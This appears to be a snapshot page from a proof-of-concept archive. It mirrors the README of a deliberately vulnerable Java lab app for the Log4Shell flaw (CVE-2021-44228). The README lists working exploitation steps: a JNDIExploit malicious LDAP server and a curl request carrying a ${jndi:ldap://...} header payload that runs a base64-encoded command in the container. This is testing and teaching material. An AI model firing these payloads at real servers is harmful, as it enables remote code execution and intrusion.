Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-44228 PoC — Apache Log4j 代码问题漏洞

Source
https://github.com/erickrr-bd/TekiumLog4jApp
Associated Vulnerability
Title:Apache Log4j 代码问题漏洞 (CVE-2021-44228)
Description:Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞,攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器,当该请求被打印成日志时就会触发远程代码执行。
Description
Java application vulnerable to CVE-2021-44228
Readme
# TekiumLog4jApp v1.0

Author: Erick Rodríguez 

Email: erickrr.tbd93@gmail.com, erodriguez@tekium.mx

License: GPLv3

Application developed in Java that simulates an application vulnerable to CVE-2021-44228. 

It uses Log4j 2.11.1 and JDK 1.8.0_181.

![TekiumLog4jApp](https://github.com/erickrr-bd/TekiumLog4jApp/blob/master/screens/screen.jpg)

# Running

Run it:

`docker run --name tekiumlog4japp -p 8080:8080 d0ck3rt3k1umhub/tekiumlog4japp:v1`

Build the Docker image by yourself:

`docker build . -t tekiumlog4japp`

`docker run -p 8080:8080 --name tekiumlog4japp tekiumlog4japp`

# Exploitation Steps

<i>Note: This project is inspired by the <a href="https://github.com/christophetd/log4shell-vulnerable-app">christophetd</a> project.</i>

JNDIExploit.v1.2.zip is included in the repository as it was apparently removed from Github.

- Use <a href="https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip">JNDIExploit</a> to spin up a malicious LDAP server

`unzip JNDIExploit.v1.2.zip`

`java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888`

- Then, trigger the exploit using:

`curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC90ZWtpdW1fcHJ1ZWJhLnR4dA==}'`

- Notice the output of JNDIExploit, showing it has sent a malicious LDAP response and served the second-stage payload:

![TekiumLog4jApp](https://github.com/erickrr-bd/TekiumLog4jApp/blob/master/screens/response.jpg)

- To confirm that the code execution was successful, notice that the file /tmp/tekium_prueba.txt was created in the container running the vulnerable application:

`docker exec tekiumlog4japp ls /tmp`

# Commercial Support
![Tekium](https://github.com/unmanarc/uAuditAnalyzer2/blob/master/art/tekium_slogo.jpeg)

Tekium is a cybersecurity company specialized in red team and blue team activities based in Mexico, it has clients in the financial, telecom and retail sectors.

Tekium is an active sponsor of the project, and provides commercial support in the case you need it.

For integration with other platforms such as the Elastic stack, SIEMs, managed security providers in-house solutions, or for any other requests for extending current functionality that you wish to see included in future versions, please contact us: info at tekium.mx

For more information, go to: https://www.tekium.mx/
File Snapshot

 [4.0K]  /data/pocs/f03d66927e45dea30f25ea8755e55f23cb64d10d
├── [ 193]  Dockerfile
├── [ 34M]  JNDIExploit.v1.2.zip
├── [2.3K]  README.md
├── [4.0K]  screens
│   ├── [ 34K]  response.jpg
│   └── [ 61K]  screen.jpg
├── [4.0K]  TekiumLog4jApp
│   ├── [1.8K]  nbactions.xml
│   ├── [1.1K]  nb-configuration.xml
│   ├── [2.7K]  pom.xml
│   └── [4.0K]  src
│       └── [4.0K]  main
│           ├── [4.0K]  java
│           │   └── [4.0K]  com
│           │       └── [4.0K]  mycompany
│           │           └── [4.0K]  tekiumlog4japp
│           │               ├── [2.2K]  main.java
│           │               └── [1.5K]  VulnerabilityLog4j.java
│           └── [4.0K]  resources
│               └── [ 407]  log4j2.xml
└── [1.8M]  TekiumLog4jApp-1.0-SNAPSHOT.jar

9 directories, 12 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.